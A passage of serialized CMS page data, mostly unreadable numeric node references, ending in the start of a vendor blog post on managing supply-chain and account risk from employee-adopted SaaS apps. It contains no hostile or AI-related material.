ype":173,"value":281030,"marks":307109,"data":307110},[],{},{"nodeType":254,"data":307112,"content":307113},{},[307114],{"nodeType":178,"data":307115,"content":307116},{},[307117],{"nodeType":173,"value":281040,"marks":307118,"data":307119},[],{},{"nodeType":178,"data":307121,"content":307122},{},[307123],{"nodeType":173,"value":281047,"marks":307124,"data":307125},[],{},{"nodeType":178,"data":307127,"content":307128},{},[307129],{"nodeType":173,"value":281054,"marks":307130,"data":307131},[],{},{"nodeType":250,"data":307133,"content":307134},{},[307135,307144,307153],{"nodeType":254,"data":307136,"content":307137},{},[307138],{"nodeType":178,"data":307139,"content":307140},{},[307141],{"nodeType":173,"value":281067,"marks":307142,"data":307143},[],{},{"nodeType":254,"data":307145,"content":307146},{},[307147],{"nodeType":178,"data":307148,"content":307149},{},[307150],{"nodeType":173,"value":281077,"marks":307151,"data":307152},[],{},{"nodeType":254,"data":307154,"content":307155},{},[307156],{"nodeType":178,"data":307157,"content":307158},{},[307159],{"nodeType":173,"value":281087,"marks":307160,"data":307161},[],{},{"nodeType":178,"data":307163,"content":307164},{},[307165],{"nodeType":173,"value":281094,"marks":307166,"data":307167},[],{},{"nodeType":178,"data":307169,"content":307170},{},[307171],{"nodeType":173,"value":281101,"marks":307172,"data":307173},[],{},{"nodeType":178,"data":307175,"content":307176},{},[307177],{"nodeType":173,"value":281108,"marks":307178,"data":307179},[],{},{"nodeType":178,"data":307181,"content":307182},{},[307183],{"nodeType":173,"value":281115,"marks":307184,"data":307185},[],{},{"nodeType":250,"data":307187,"content":307188},{},[307189],{"nodeType":254,"data":307190,"content":307191},{},[307192],{"nodeType":178,"data":307193,"content":307194},{},[307195],{"nodeType":173,"value":281128,"marks":307196,"data":307197},[],{},{"nodeType":178,"data":307199,"content":307200},{},[307201],{"nodeType":173,"value":281135,"marks":307202,"data":307203},[],{},{"nodeType":250,"data":307205,"content":307206},{},[307207,307246,307255],{"nodeType":254,"data":307208,"content":307209},{},[307210],{"nodeType":178,"data":307211,"content":307212},{},[307213,307216,307223,307226,307233,307236,307243],{"nodeType":173,"value":281148,"marks":307214,"data":307215},[],{},{"nodeType":186,"data":307217,"content":307218},{"uri":281153},[307219],{"nodeType":173,"value":281156,"marks":307220,"data":307222},[307221],{"type":194},{},{"nodeType":173,"value":2936,"marks":307224,"data":307225},[],{},{"nodeType":186,"data":307227,"content":307228},{"uri":281165},[307229],{"nodeType":173,"value":211167,"marks":307230,"data":307232},[307231],{"type":194},{},{"nodeType":173,"value":2936,"marks":307234,"data":307235},[],{},{"nodeType":186,"data":307237,"content":307238},{"uri":281176},[307239],{"nodeType":173,"value":281179,"marks":307240,"data":307242},[307241],{"type":194},{},{"nodeType":173,"value":281184,"marks":307244,"data":307245},[],{},{"nodeType":254,"data":307247,"content":307248},{},[307249],{"nodeType":178,"data":307250,"content":307251},{},[307252],{"nodeType":173,"value":281194,"marks":307253,"data":307254},[],{},{"nodeType":254,"data":307256,"content":307257},{},[307258],{"nodeType":178,"data":307259,"content":307260},{},[307261],{"nodeType":173,"value":281204,"marks":307262,"data":307263},[],{},{"nodeType":235,"data":307265,"content":307266},{},[307267],{"nodeType":173,"value":281211,"marks":307268,"data":307269},[],{},{"nodeType":178,"data":307271,"content":307272},{},[307273],{"nodeType":173,"value":281218,"marks":307274,"data":307275},[],{},{"nodeType":246189,"data":307277,"content":307278},{},[307279,307288],{"nodeType":254,"data":307280,"content":307281},{},[307282],{"nodeType":178,"data":307283,"content":307284},{},[307285],{"nodeType":173,"value":281231,"marks":307286,"data":307287},[],{},{"nodeType":254,"data":307289,"content":307290},{},[307291],{"nodeType":178,"data":307292,"content":307293},{},[307294],{"nodeType":173,"value":281241,"marks":307295,"data":307296},[],{},{"nodeType":312,"data":307298,"content":307301},{"target":307299},{"sys":307300},{"id":281248,"type":317,"linkType":318},[],{"nodeType":178,"data":307303,"content":307304},{},[307305],{"nodeType":173,"value":281254,"marks":307306,"data":307307},[],{},{"nodeType":169,"data":307309,"content":307310},{},[307311],{"nodeType":173,"value":281261,"marks":307312,"data":307313},[],{},{"nodeType":178,"data":307315,"content":307316},{},[307317],{"nodeType":173,"value":281268,"marks":307318,"data":307319},[],{},{"nodeType":250,"data":307321,"content":307322},{},[307323,307332,307341],{"nodeType":254,"data":307324,"content":307325},{},[307326],{"nodeType":178,"data":307327,"content":307328},{},[307329],{"nodeType":173,"value":281281,"marks":307330,"data":307331},[],{},{"nodeType":254,"data":307333,"content":307334},{},[307335],{"nodeType":178,"data":307336,"content":307337},{},[307338],{"nodeType":173,"value":281291,"marks":307339,"data":307340},[],{},{"nodeType":254,"data":307342,"content":307343},{},[307344],{"nodeType":178,"data":307345,"content":307346},{},[307347],{"nodeType":173,"value":281301,"marks":307348,"data":307349},[],{},{"nodeType":178,"data":307351,"content":307352},{},[307353],{"nodeType":173,"value":281308,"marks":307354,"data":307355},[],{},{"nodeType":1653,"data":307357,"content":307358},{},[307359,307382,307450,307499,307537,307644],{"nodeType":1657,"data":307360,"content":307361},{},[307362,307372],{"nodeType":1687,"data":307363,"content":307364},{},[307365],{"nodeType":178,"data":307366,"content":307367},{},[307368],{"nodeType":173,"value":281324,"marks":307369,"data":307371},[307370],{"type":370},{},{"nodeType":1687,"data":307373,"content":307374},{},[307375],{"nodeType":178,"data":307376,"content":307377},{},[307378],{"nodeType":173,"value":281335,"marks":307379,"data":307381},[307380],{"type":370},{},{"nodeType":1657,"data":307383,"content":307384},{},[307385,307394],{"nodeType":1687,"data":307386,"content":307387},{},[307388],{"nodeType":178,"data":307389,"content":307390},{},[307391],{"nodeType":173,"value":281349,"marks":307392,"data":307393},[],{},{"nodeType":1687,"data":307395,"content":307396},{},[307397,307420],{"nodeType":178,"data":307398,"content":307399},{},[307400,307403,307410,307413,307417],{"nodeType":173,"value":37,"marks":307401,"data":307402},[],{},{"nodeType":186,"data":307404,"content":307405},{"uri":281363},[307406],{"nodeType":173,"value":281366,"marks":307407,"data":307409},[307408],{"type":194},{},{"nodeType":173,"value":281371,"marks":307411,"data":307412},[],{},{"nodeType":173,"value":281375,"marks":307414,"data":307416},[307415],{"type":370},{},{"nodeType":173,"value":281380,"marks":307418,"data":307419},[],{},{"nodeType":178,"data":307421,"content":307422},{},[307423,307426,307433,307436,307440,307443,307447],{"nodeType":173,"value":281387,"marks":307424,"data":307425},[],{},{"nodeType":186,"data":307427,"content":307428},{"uri":281392},[307429],{"nodeType":173,"value":281395,"marks":307430,"data":307432},[307431],{"type":194},{},{"nodeType":173,"value":281400,"marks":307434,"data":307435},[],{},{"nodeType":173,"value":281404,"marks":307437,"data":307439},[307438],{"type":370},{},{"nodeType":173,"value":281409,"marks":307441,"data":307442},[],{},{"nodeType":173,"value":281179,"marks":307444,"data":307446},[307445],{"type":370},{},{"nodeType":173,"value":281417,"marks":307448,"data":307449},[],{},{"nodeType":1657,"data":307451,"content":307452},{},[307453,307462],{"nodeType":1687,"data":307454,"content":307455},{},[307456],{"nodeType":178,"data":307457,"content":307458},{},[307459],{"nodeType":173,"value":281430,"marks":307460,"data":307461},[],{},{"nodeType":1687,"data":307463,"content":307464},{},[307465],{"nodeType":178,"data":307466,"content":307467},{},[307468,307472,307475,307482,307485,307489,307492,307496],{"nodeType":173,"value":211167,"marks":307469,"data":307471},[307470],{"type":370},{},{"nodeType":173,"value":281444,"marks":307473,"data":307474},[],{},{"nodeType":186,"data":307476,"content":307477},{"uri":281449},[307478],{"nodeType":173,"value":281452,"marks":307479,"data":307481},[307480],{"type":194},{},{"nodeType":173,"value":281457,"marks":307483,"data":307484},[],{},{"nodeType":173,"value":281461,"marks":307486,"data":307488},[307487],{"type":370},{},{"nodeType":173,"value":281466,"marks":307490,"data":307491},[],{},{"nodeType":173,"value":281404,"marks":307493,"data":307495},[307494],{"type":370},{},{"nodeType":173,"value":281474,"marks":307497,"data":307498},[],{},{"nodeType":1657,"data":307500,"content":307501},{},[307502,307511],{"nodeType":1687,"data":307503,"content":307504},{},[307505],{"nodeType":178,"data":307506,"content":307507},{},[307508],{"nodeType":173,"value":281487,"marks":307509,"data":307510},[],{},{"nodeType":1687,"data":307512,"content":307513},{},[307514],{"nodeType":178,"data":307515,"content":307516},{},[307517,307520,307524,307527,307534],{"nodeType":173,"value":281497,"marks":307518,"data":307519},[],{},{"nodeType":173,"value":211167,"marks":307521,"data":307523},[307522],{"type":370},{},{"nodeType":173,"value":281505,"marks":307525,"data":307526},[],{},{"nodeType":186,"data":307528,"content":307529},{"uri":281510},[307530],{"nodeType":173,"value":281513,"marks":307531,"data":307533},[307532],{"type":194},{},{"nodeType":173,"value":37,"marks":307535,"data":307536},[],{},{"nodeType":1657,"data":307538,"content":307539},{},[307540,307549],{"nodeType":1687,"data":307541,"content":307542},{},[307543],{"nodeType":178,"data":307544,"content":307545},{},[307546],{"nodeType":173,"value":281530,"marks":307547,"data":307548},[],{},{"nodeType":1687,"data":307550,"content":307551},{},[307552,307586,307609,307622,307638],{"nodeType":178,"data":307553,"content":307554},{},[307555,307559,307562,307566,307569,307576,307579,307583],{"nodeType":173,"value":281179,"marks":307556,"data":307558},[307557],{"type":370},{},{"nodeType":173,"value":281544,"marks":307560,"data":307561},[],{},{"nodeType":173,"value":211167,"marks":307563,"data":307565},[307564],{"type":370},{},{"nodeType":173,"value":281552,"marks":307567,"data":307568},[],{},{"nodeType":186,"data":307570,"content":307571},{"uri":281557},[307572],{"nodeType":173,"value":281560,"marks":307573,"data":307575},[307574],{"type":194},{},{"nodeType":173,"value":281565,"marks":307577,"data":307578},[],{},{"nodeType":173,"value":281569,"marks":307580,"data":307582},[307581],{"type":370},{},{"nodeType":173,"value":281574,"marks":307584,"data":307585},[],{},{"nodeType":178,"data":307587,"content":307588},{},[307589,307592,307596,307599,307606],{"nodeType":173,"value":281581,"marks":307590,"data":307591},[],{},{"nodeType":173,"value":281179,"marks":307593,"data":307595},[307594],{"type":370},{},{"nodeType":173,"value":3107,"marks":307597,"data":307598},[],{},{"nodeType":186,"data":307600,"content":307601},{"uri":281593},[307602],{"nodeType":173,"value":281596,"marks":307603,"data":307605},[307604],{"type":194},{},{"nodeType":173,"value":281601,"marks":307607,"data":307608},[],{},{"nodeType":178,"data":307610,"content":307611},{},[307612,307615,307619],{"nodeType":173,"value":281608,"marks":307613,"data":307614},[],{},{"nodeType":173,"value":3107,"marks":307616,"data":307618},[307617],{"type":370},{},{"nodeType":173,"value":281616,"marks":307620,"data":307621},[],{},{"nodeType":178,"data":307623,"content":307624},{},[307625,307628,307635],{"nodeType":173,"value":281623,"marks":307626,"data":307627},[],{},{"nodeType":186,"data":307629,"content":307630},{"uri":281628},[307631],{"nodeType":173,"value":281631,"marks":307632,"data":307634},[307633],{"type":194},{},{"nodeType":173,"value":197,"marks":307636,"data":307637},[],{},{"nodeType":178,"data":307639,"content":307640},{},[307641],{"nodeType":173,"value":281642,"marks":307642,"data":307643},[],{},{"nodeType":1657,"data":307645,"content":307646},{},[307647,307656],{"nodeType":1687,"data":307648,"content":307649},{},[307650],{"nodeType":178,"data":307651,"content":307652},{},[307653],{"nodeType":173,"value":281655,"marks":307654,"data":307655},[],{},{"nodeType":1687,"data":307657,"content":307658},{},[307659],{"nodeType":178,"data":307660,"content":307661},{},[307662,307665,307672,307675,307679,307682,307694],{"nodeType":173,"value":281665,"marks":307663,"data":307664},[],{},{"nodeType":186,"data":307666,"content":307667},{"uri":281670},[307668],{"nodeType":173,"value":281673,"marks":307669,"data":307671},[307670],{"type":194},{},{"nodeType":173,"value":281678,"marks":307673,"data":307674},[],{},{"nodeType":173,"value":211167,"marks":307676,"data":307678},[307677],{"type":370},{},{"nodeType":173,"value":933,"marks":307680,"data":307681},[],{},{"nodeType":186,"data":307683,"content":307684},{"uri":281690},[307685,307690],{"nodeType":173,"value":281693,"marks":307686,"data":307689},[307687,307688],{"type":194},{"type":370},{},{"nodeType":173,"value":281699,"marks":307691,"data":307693},[307692],{"type":194},{},{"nodeType":173,"value":281704,"marks":307695,"data":307696},[],{},{"nodeType":178,"data":307698,"content":307699},{},[307700],{"nodeType":173,"value":281711,"marks":307701,"data":307702},[],{},{"nodeType":178,"data":307704,"content":307705},{},[307706,307709,307716],{"nodeType":173,"value":281718,"marks":307707,"data":307708},[],{},{"nodeType":186,"data":307710,"content":307711},{"uri":281723},[307712],{"nodeType":173,"value":281156,"marks":307713,"data":307715},[307714],{"type":194},{},{"nodeType":173,"value":281730,"marks":307717,"data":307718},[],{},{"nodeType":178,"data":307720,"content":307721},{},[307722],{"nodeType":173,"value":281737,"marks":307723,"data":307724},[],{},{"nodeType":178,"data":307726,"content":307727},{},[307728],{"nodeType":173,"value":281744,"marks":307729,"data":307732},[307730,307731],{"type":370},{"type":1646},{},{"nodeType":178,"data":307734,"content":307735},{},[307736,307739,307743],{"nodeType":173,"value":281753,"marks":307737,"data":307738},[],{},{"nodeType":173,"value":281757,"marks":307740,"data":307742},[307741],{"type":1646},{},{"nodeType":173,"value":281762,"marks":307744,"data":307745},[],{},{"nodeType":169,"data":307747,"content":307748},{},[307749],{"nodeType":173,"value":281769,"marks":307750,"data":307751},[],{},{"nodeType":178,"data":307753,"content":307754},{},[307755],{"nodeType":173,"value":281776,"marks":307756,"data":307757},[],{},{"nodeType":178,"data":307759,"content":307760},{},[307761],{"nodeType":173,"value":281783,"marks":307762,"data":307763},[],{},{"items":307765},[307766,307768],{"sys":307767,"name":505},{"id":504},{"sys":307769,"name":274157},{"id":274156},{"items":307771},[307772],{"fullName":13977,"firstName":13978,"jobTitle":13979,"profilePicture":307773},{"url":13981},{"__typename":1528,"sys":307775,"content":307776,"title":284927,"synopsis":309293,"hashTags":118,"publishedDate":309294,"slug":284928,"tagsCollection":309295,"authorsCollection":309301},{"id":283745},{"json":307777},{"nodeType":165,"data":307778,"content":307779},{},[307780,307786,307806,307812,307819,307830,307837,307844,307887,307894,307901,307906,307913,307920,307927,307932,307955,307962,307969,307976,307983,307989,308091,308098,308105,308112,308125,308132,308139,308146,308153,308159,308166,308173,308180,308185,308193,308200,308207,308214,308221,308228,308235,308241,308248,308255,308262,308269,308274,308281,308320,308325,308332,308355,308362,308385,308392,308399,308406,308413,308420,308530,308535,308542,308551,308558,308565,308572,308579,308586,308593,308598,308605,308612,308630,308637,308644,308651,308656,308663,308670,308676,308708,308715,308722,308729,308736,308743,308750,308757,308764,308771,308778,308821,308828,308834,308855,308862,308869,308876,308883,308890,308897,308904,308911,308918,308925,308932,308939,308946,308987,308993,309000,309016,309032,309039,309046,309053,309060,309067,309073,309080,309087,309094,309100,309107,309114,309119,309126,309132,309139,309145,309154,309160,309167,309224,309229,309236,309243,309248,309255,309262,309269,309275,309286],{"nodeType":169,"data":307781,"content":307782},{},[307783],{"nodeType":173,"value":258287,"marks":307784,"data":307785},[],{},{"nodeType":178,"data":307787,"content":307788},{},[307789,307793,307802],{"nodeType":173,"value":307790,"marks":307791,"data":307792},"Here’s hoping you’ve read my previous blog: ",[],{},{"nodeType":1698,"data":307794,"content":307797},{"target":307795},{"sys":307796},{"id":280332,"type":317,"linkType":318},[307798],{"nodeType":173,"value":281786,"marks":307799,"data":307801},[307800],{"type":1646},{},{"nodeType":173,"value":307803,"marks":307804,"data":307805},"If you haven’t, the key takeaway of that piece is that SaaS vendors have changed how software is adopted into a business. Now, the majority of SaaS vendors build their products on a product-led growth model - which simply means they want users (your employees) to self-adopt their apps, start using them (and integrating with your data to do so), and become a useful tool for the employee. ",[],{},{"nodeType":178,"data":307807,"content":307808},{},[307809],{"nodeType":173,"value":273253,"marks":307810,"data":307811},[],{},{"nodeType":178,"data":307813,"content":307814},{},[307815],{"nodeType":173,"value":307816,"marks":307817,"data":307818},"This self-adoption has turned the product-adoption process on its head - leaving security and IT teams blind to which apps sensitive company data is flowing into. ",[],{},{"nodeType":178,"data":307820,"content":307821},{},[307822,307827],{"nodeType":173,"value":307823,"marks":307824,"data":307826},"How do you make sure your data stays secure in this new software-adoption flow?",[307825],{"type":370},{},{"nodeType":173,"value":10557,"marks":307828,"data":307829},[],{},{"nodeType":178,"data":307831,"content":307832},{},[307833],{"nodeType":173,"value":307834,"marks":307835,"data":307836},"In this book, we’ll offer some practical guidance on how to manage supply chain risk without slowing down the business.",[],{},{"nodeType":178,"data":307838,"content":307839},{},[307840],{"nodeType":173,"value":307841,"marks":307842,"data":307843},"We’ll cover how to:",[],{},{"nodeType":250,"data":307845,"content":307846},{},[307847,307857,307867,307877],{"nodeType":254,"data":307848,"content":307849},{},[307850],{"nodeType":178,"data":307851,"content":307852},{},[307853],{"nodeType":173,"value":307854,"marks":307855,"data":307856},"Split SaaS risk into supply chain risk and account compromise risk so you can tackle them in parallel.",[],{},{"nodeType":254,"data":307858,"content":307859},{},[307860],{"nodeType":178,"data":307861,"content":307862},{},[307863],{"nodeType":173,"value":307864,"marks":307865,"data":307866},"Tap into the SaaS self adoption process in real time so you can manage supply chain risk without being a blocker. ",[],{},{"nodeType":254,"data":307868,"content":307869},{},[307870],{"nodeType":178,"data":307871,"content":307872},{},[307873],{"nodeType":173,"value":307874,"marks":307875,"data":307876},"How to prioritize account security controls and prevent the most common SaaS attacks.",[],{},{"nodeType":254,"data":307878,"content":307879},{},[307880],{"nodeType":178,"data":307881,"content":307882},{},[307883],{"nodeType":173,"value":307884,"marks":307885,"data":307886},"Better choose a SaaS security product by looking at the data these tools are built on.",[],{},{"nodeType":169,"data":307888,"content":307889},{},[307890],{"nodeType":173,"value":307891,"marks":307892,"data":307893},"\nThe two halves of SaaS Security",[],{},{"nodeType":178,"data":307895,"content":307896},{},[307897],{"nodeType":173,"value":307898,"marks":307899,"data":307900},"It’s useful to consider the shared-responsibility model to understand the two main parts of SaaS security. Consider the following diagram that shows the customer’s responsibility in various as-a-Service models:",[],{},{"nodeType":312,"data":307902,"content":307905},{"target":307903},{"sys":307904},{"id":281011,"type":317,"linkType":318},[],{"nodeType":178,"data":307907,"content":307908},{},[307909],{"nodeType":173,"value":307910,"marks":307911,"data":307912},"In this SaaS model, we’re delegating a lot of responsibility for security to the vendor. That’s great because it takes the load off of us - the customer - and the vendor is better placed to secure their software. However, this requires far greater trust in the vendor.",[],{},{"nodeType":178,"data":307914,"content":307915},{},[307916],{"nodeType":173,"value":307917,"marks":307918,"data":307919},"While we’re offloading a lot to the SaaS vendor, we aren’t offloading everything. You still need to take care of your responsibilities, limited as they are!",[],{},{"nodeType":178,"data":307921,"content":307922},{},[307923],{"nodeType":173,"value":307924,"marks":307925,"data":307926},"This gets us to the two halves of SaaS security:",[],{},{"nodeType":312,"data":307928,"content":307931},{"target":307929},{"sys":307930},{"id":281248,"type":317,"linkType":318},[],{"nodeType":250,"data":307933,"content":307934},{},[307935,307945],{"nodeType":254,"data":307936,"content":307937},{},[307938],{"nodeType":178,"data":307939,"content":307940},{},[307941],{"nodeType":173,"value":307942,"marks":307943,"data":307944},"Supply chain risk - can you trust the product, the vendor, and the vendor’s sub processors to secure your data and the access you grant them to your systems?",[],{},{"nodeType":254,"data":307946,"content":307947},{},[307948],{"nodeType":178,"data":307949,"content":307950},{},[307951],{"nodeType":173,"value":307952,"marks":307953,"data":307954},"Customer responsibility - how can you make sure you’re using the product securely? You’ll need to focus here specifically on account security and application configuration.",[],{},{"nodeType":178,"data":307956,"content":307957},{},[307958],{"nodeType":173,"value":307959,"marks":307960,"data":307961},"Let’s look at each of these in turn.",[],{},{"nodeType":169,"data":307963,"content":307964},{},[307965],{"nodeType":173,"value":307966,"marks":307967,"data":307968},"Manage supply-chain risk",[],{},{"nodeType":178,"data":307970,"content":307971},{},[307972],{"nodeType":173,"value":307973,"marks":307974,"data":307975},"Security due diligence or app risk assessments are typically how you answer the question “should we use this app?” These are standard processes for most organizations as part of a software procurement process.",[],{},{"nodeType":178,"data":307977,"content":307978},{},[307979],{"nodeType":173,"value":307980,"marks":307981,"data":307982},"However, security no longer controls the cadence of software adoption - employees are self-adopting the tools they want without oversight - so we must work to find serious risks as soon as possible once the self-adoption process begins (normally by the first employee creating an account on the app).",[],{},{"nodeType":178,"data":307984,"content":307985},{},[307986],{"nodeType":173,"value":300470,"marks":307987,"data":307988},[],{},{"nodeType":250,"data":307990,"content":307991},{},[307992,308023,308081],{"nodeType":254,"data":307993,"content":307994},{},[307995,308002],{"nodeType":178,"data":307996,"content":307997},{},[307998],{"nodeType":173,"value":307999,"marks":308000,"data":308001},"Product risk ",[],{},{"nodeType":250,"data":308003,"content":308004},{},[308005,308014],{"nodeType":254,"data":308006,"content":308007},{},[308008],{"nodeType":178,"data":308009,"content":308010},{},[308011],{"nodeType":173,"value":300500,"marks":308012,"data":308013},[],{},{"nodeType":254,"data":308015,"content":308016},{},[308017],{"nodeType":178,"data":308018,"content":308019},{},[308020],{"nodeType":173,"value":300510,"marks":308021,"data":308022},[],{},{"nodeType":254,"data":308024,"content":308025},{},[308026,308033],{"nodeType":178,"data":308027,"content":308028},{},[308029],{"nodeType":173,"value":308030,"marks":308031,"data":308032},"Vendor risk ",[],{},{"nodeType":250,"data":308034,"content":308035},{},[308036,308045,308054,308063,308072],{"nodeType":254,"data":308037,"content":308038},{},[308039],{"nodeType":178,"data":308040,"content":308041},{},[308042],{"nodeType":173,"value":300537,"marks":308043,"data":308044},[],{},{"nodeType":254,"data":308046,"content":308047},{},[308048],{"nodeType":178,"data":308049,"content":308050},{},[308051],{"nodeType":173,"value":300547,"marks":308052,"data":308053},[],{},{"nodeType":254,"data":308055,"content":308056},{},[308057],{"nodeType":178,"data":308058,"content":308059},{},[308060],{"nodeType":173,"value":300557,"marks":308061,"data":308062},[],{},{"nodeType":254,"data":308064,"content":308065},{},[308066],{"nodeType":178,"data":308067,"content":308068},{},[308069],{"nodeType":173,"value":300567,"marks":308070,"data":308071},[],{},{"nodeType":254,"data":308073,"content":308074},{},[308075],{"nodeType":178,"data":308076,"content":308077},{},[308078],{"nodeType":173,"value":300577,"marks":308079,"data":308080},[],{},{"nodeType":254,"data":308082,"content":308083},{},[308084],{"nodeType":178,"data":308085,"content":308086},{},[308087],{"nodeType":173,"value":308088,"marks":308089,"data":308090},"Vendor sub processors - the majority of SaaS applications are build on other *-as-a-Service platforms. These vendors are also part of your supply chain. Just because you don’t directly use a tool or app doesn’t mean you’re not affected when they’re popped. Realistically, you’re probably not going to be able to go very deep here, but when you’re wondering whether you’re affected by a breach in the news, you may want to know whether your vendors are using the affected SaaS app. ",[],{},{"nodeType":178,"data":308092,"content":308093},{},[308094],{"nodeType":173,"value":308095,"marks":308096,"data":308097},"Ultimately, how much you care about any of the above comes down to the risk of the data in the application or the level of access you grant this application into the rest of your infrastructure (often through integrations with other SaaS apps). ",[],{},{"nodeType":178,"data":308099,"content":308100},{},[308101],{"nodeType":173,"value":308102,"marks":308103,"data":308104},"Therefore, a useful first step to knowing where to prioritize your time is to understand the sensitivity of the data and access granted to the app (or that will likely be granted by employees in future to make the app work as expected).",[],{},{"nodeType":178,"data":308106,"content":308107},{},[308108],{"nodeType":173,"value":308109,"marks":308110,"data":308111},"For self-adopted SaaS apps, aspects that are typically very important for software procurement like legal agreements (terms and conditions, master service agreements etc.), spend (through licensing cost etc.), and uptime and availability (SLAs etc.) are typically dealt with after the app has been adopted. Often, this comes up once employees need to upgrade to a paid account or higher license tier, or once it makes financial sense to commit to longer term agreements. ",[],{},{"nodeType":178,"data":308113,"content":308114},{},[308115,308119],{"nodeType":173,"value":308116,"marks":308117,"data":308118},"For that reason, ",[],{},{"nodeType":173,"value":308120,"marks":308121,"data":308124},"I recommend you keep the security risk assessment focused on the direct security aspects initially so you reduce the work required to ask “is there a security reason to stop our employees from using this app right now?”",[308122,308123],{"type":370},{"type":1646},{},{"nodeType":178,"data":308126,"content":308127},{},[308128],{"nodeType":173,"value":308129,"marks":308130,"data":308131},"All of the above is relatively straightforward advice, but there are some very practical non-obvious lessons learned from others who've walked this path already that are worth highlighting, so let’s jump into those.",[],{},{"nodeType":235,"data":308133,"content":308134},{},[308135],{"nodeType":173,"value":308136,"marks":308137,"data":308138},"Focus on the new stuff first",[],{},{"nodeType":178,"data":308140,"content":308141},{},[308142],{"nodeType":173,"value":308143,"marks":308144,"data":308145},"It’s both technically, and politically, very difficult to migrate users away from apps, especially when users have invested significant time into setting up an app and love how it works. It’s hard to spend the goodwill you’ve built up on something like this unless there really is a truly unacceptable risk or compliance issue.",[],{},{"nodeType":178,"data":308147,"content":308148},{},[308149],{"nodeType":173,"value":308150,"marks":308151,"data":308152},"There is an exception to this - if you get in before employees have sunk too much time and effort into an app they are far more open to input and steering. This is why we recommend that you focus your risk assessment efforts on new apps and integrations, rather than spending the majority of your time working through the backlog of already-adopted work apps.",[],{},{"nodeType":312,"data":308154,"content":308158},{"target":308155},{"sys":308156},{"id":308157,"type":317,"linkType":318},"49tL50Pga47pnhp1WMHfPY",[],{"nodeType":178,"data":308160,"content":308161},{},[308162],{"nodeType":173,"value":308163,"marks":308164,"data":308165},"If you focus on apps that are still in the testing phases, it's much easier to steer the course towards lower-risk alternatives or pump the brakes when there really is significant risk to the business.",[],{},{"nodeType":169,"data":308167,"content":308168},{},[308169],{"nodeType":173,"value":308170,"marks":308171,"data":308172},"Buy yourself time",[],{},{"nodeType":178,"data":308174,"content":308175},{},[308176],{"nodeType":173,"value":308177,"marks":308178,"data":308179},"Remember, even the newest apps will only be new for a brief time. Once employees have invested significant time into an app (learning how it works, putting data into it, etc) they will be resistant to considering alternatives and will push to accept risks rather and make exceptions to policies rather than moving to an alternative app. This is just natural, but it does mean that there is a clock running for you and your team as soon as an employee creates an account on a new SaaS app.",[],{},{"nodeType":312,"data":308181,"content":308184},{"target":308182},{"sys":308183},{"id":284133,"type":317,"linkType":318},[],{"nodeType":178,"data":308186,"content":308187},{},[308188],{"nodeType":173,"value":308189,"marks":308190,"data":308192},"Your goal is to give your security team as much time to assess the app before the employee decides for sure they want to use it for work. ",[308191],{"type":370},{},{"nodeType":178,"data":308194,"content":308195},{},[308196],{"nodeType":173,"value":308197,"marks":308198,"data":308199},"It’s far less useful if you discover an app once the team is talking to finance about upgrading to a paid subscription. At that point, so much time and effort has been invested that it’s very difficult to motivate employees/teams to move to a lower-risk app. In this scenario, you’ll be stuck in a “let’s do as much as we can to secure this” mode, which isn’t ideal.",[],{},{"nodeType":178,"data":308201,"content":308202},{},[308203],{"nodeType":173,"value":308204,"marks":308205,"data":308206},"The way to give the security team as much time as possible is to reduce the delta between an employee signing up for an account and the IT and security teams finding out about it. You need a way to find out about new apps being adopted in real-time or within hours, rather than days or weeks. The tools to do this exist, but more on how you should choose the right tool in the “importance of choosing the right data source” section.",[],{},{"nodeType":235,"data":308208,"content":308209},{},[308210],{"nodeType":173,"value":308211,"marks":308212,"data":308213},"You need accurate data to take action",[],{},{"nodeType":178,"data":308215,"content":308216},{},[308217],{"nodeType":173,"value":308218,"marks":308219,"data":308220},"To discover SaaS apps and simply inventory which apps are being used for reporting purposes, you won’t need perfect accuracy and you’ll be able to live with some false positives.",[],{},{"nodeType":178,"data":308222,"content":308223},{},[308224],{"nodeType":173,"value":308225,"marks":308226,"data":308227},"Most security teams start out just by getting visibility of what SaaS is being used across their business. Then you know what you’re dealing with. The downside is that you’ll want to use this data to spin off a risk assessment process. If you are kicking off risk assessments based on false positives, that’s just pure wasted effort.",[],{},{"nodeType":178,"data":308229,"content":308230},{},[308231],{"nodeType":173,"value":308232,"marks":308233,"data":308234},"You will likely also want to get in touch with the employee that adopted the app, for example to understand their intended use-case and the data that might be going into the app. Employees will also notice quickly if the security team can’t tell the difference between accessing an app website or using an app and get annoyed with the interruptions from your team.",[],{},{"nodeType":312,"data":308236,"content":308240},{"target":308237},{"sys":308238},{"id":308239,"type":317,"linkType":318},"5winuguRBMaNKNnkDakMWv",[],{"nodeType":178,"data":308242,"content":308243},{},[308244],{"nodeType":173,"value":308245,"marks":308246,"data":308247},"Many tools will use things like scanning employee email inboxes or network-level data to “discover employee SaaS use,” but this leads to a frustrating rate of false positives for your team. If the security team needs to first confirm if a data point is a false-positive through some unspecified process, then that seriously increases the work needed to take action. ",[],{},{"nodeType":178,"data":308249,"content":308250},{},[308251],{"nodeType":173,"value":308252,"marks":308253,"data":308254},"At the risk of sounding like a broken record, accurate data is the thing that turns this problem from something that’s impossible to something which is manageable, even at scale.",[],{},{"nodeType":169,"data":308256,"content":308257},{},[308258],{"nodeType":173,"value":308259,"marks":308260,"data":308261},"Customer responsibility for self-adopted SaaS",[],{},{"nodeType":178,"data":308263,"content":308264},{},[308265],{"nodeType":173,"value":308266,"marks":308267,"data":308268},"As a reminder, I’m referring in this section to your responsibility as a customer (highlighted in purple) in terms of NCSC’s shared-responsibility model shown below:",[],{},{"nodeType":312,"data":308270,"content":308273},{"target":308271},{"sys":308272},{"id":283612,"type":317,"linkType":318},[],{"nodeType":178,"data":308275,"content":308276},{},[308277],{"nodeType":173,"value":308278,"marks":308279,"data":308280},"Let’s start with the bulk of the work, which for self-adopted SaaS is account security. This includes all the usual suspects like ensuring that, 